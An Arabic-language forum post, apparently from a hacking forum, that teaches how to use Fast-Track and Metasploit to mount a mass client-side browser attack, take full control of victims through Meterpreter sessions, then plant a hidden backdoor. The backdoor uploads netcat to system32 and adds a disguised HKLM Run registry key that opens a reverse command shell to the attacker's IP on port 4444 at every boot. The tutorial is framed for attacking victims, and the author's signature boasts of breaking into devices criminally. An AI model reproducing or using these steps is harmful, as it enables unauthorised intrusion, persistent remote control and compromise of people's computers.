بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته .. وشلونكم ؟ ندخل في صلب الموضوع .. طبعا المكتوب واضح من عنوانه .. راح نستخدم اداة الفاست تراك في تطبيق هجوم الـ Client-side طيب يا عامر وش يعني ؟ باختصار شديد .. هو تجميع اكبر عدد ممكن من الاكسبلويتات الموجودة بالميتاسبلويت في وقت واحد و في ايفريم واحد على سيرفر محلي .. طيب ندخل على التيرمنال .. بوضعية الجذر و نكتب الامر لدخول مجلد الفاست تراك كود: cd/pentest/exploits/fasttrack لو تستعرض الملفات الموجودة بالمجلد .. بتلقى سكربت الفاست تراك بلغة البايثون .. طيب نشغله بالامر .. كود: ./fast-track.py -i -i تعني تشغيل السكربت داخل التيرمنال .. الان بيطلع لنا عدة خيارات ممكن تنفذها .. و كل مهمة لها رقم محدد هجومنا المطلوب اسمه Mass Client-Side Attack و رقمه 4 .. يعني نحدده بالرقم 4 من ثم بيطلب منك السكربت وضع الاي بي اللي راح يكون سيرفر للتنصت عليه ( الاي بي تبعك طبعا ) من ثم بيعرض لك 4 بايلودات تختار منها اللي تبي .. يفضل Meterpreter لان راح نستخدمه بعد شوي لسهولته .. ثم بيسالك اذا تبي تعمل ارب بويزنينج اطلب منه لا .. الان الاداة تقوم بعملها و تجميع الثغرات الممكن و بدأ السيرفر .. ننتظر الى ان تنتهي .. بكملة Server started بامكانك عمل سبوفينج بالسيرفر .. ( شارحها في مواضيع سابقة بالتفصيل ) عموما .. الان نفرض لقطنا الضحية بيخبرك ان فيه جلسة جديدة مفتوحة .. ندخل لها بالامر كود: sessions -i 1 1 يعني رقم الجلسة .. الان امامك الضحية .. و يمكنك تتحكم فيه تحكم كامل ================================================== ========= دور المفاجئة :- المفاجئة يا طويل العمر هي استخدام النت كات كـ Backdoor يتم حقنه بالرجيستري ليتنصت على الاي بي تبعنا داخل مجلد بدء التشغيل .. اولا: نرفع النت كات الى على هالمسار داخل جهاز الضحية .. كود: upload /tmp/nc***** C:\\windows\\system32\\nc***** الان ندخل على موجه الاوامر تبع الضحية .. كود: execute -c -H -f cmd***** -i وش السواة الحين ؟ امر بسيط لحقن مفتاح ريجيستري بهالقيمة .. nc -d -e cmd***** 192.168.1.3 4444 مع التغيير للاي بي تبعك .. و المقصود بهالامر تنفيذ التنصت خلال بداية التشغيل بوضعية موجه الاوامر .. و هذا هو الامر كامل كود: reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd***** 192.168.1.3 4444"/ reg add : واضح .. امر بدائي لاضافة اي مفتاح hklm : و تعني مجلد HKEY_LOCAL_MACHINE /v : و تعني اسم المفتاح و انا هنا موهت بالاسم systemfile /t : و تعني نوع المفتاح و في الاغلب يكون reg_sz /d : و هنا تتلخص الزبدة تبعنا .. و هي البيانات المطلوبة و هذي بيناتنا n c -d -e cmd***** 192.168.1.3 4444 الان و بعد زرع المفتاح .. نروح للتيرمنال و ونتنصت على البورت 4444 .. كود: nc -vlp 4444 و الضحية راح يشبك معك يوميا .. اي استفسارات انا موجود .. بالخدمة
قــــــيــــــصــــــر الــــــهــــــكــــــر أذآ فكرت في أختراقي سآرفع يدي أحترآم لك ولشجاعتك ولآكن تأكد أنني لن أنزلها ألى على حرق جهازك لآ أحب دخول الآجهزة بأحترآم أحب دخول الآجهزة بآجرام لتوآصل[email protected] قناتي على اليوتيوب
قوانين المنتدى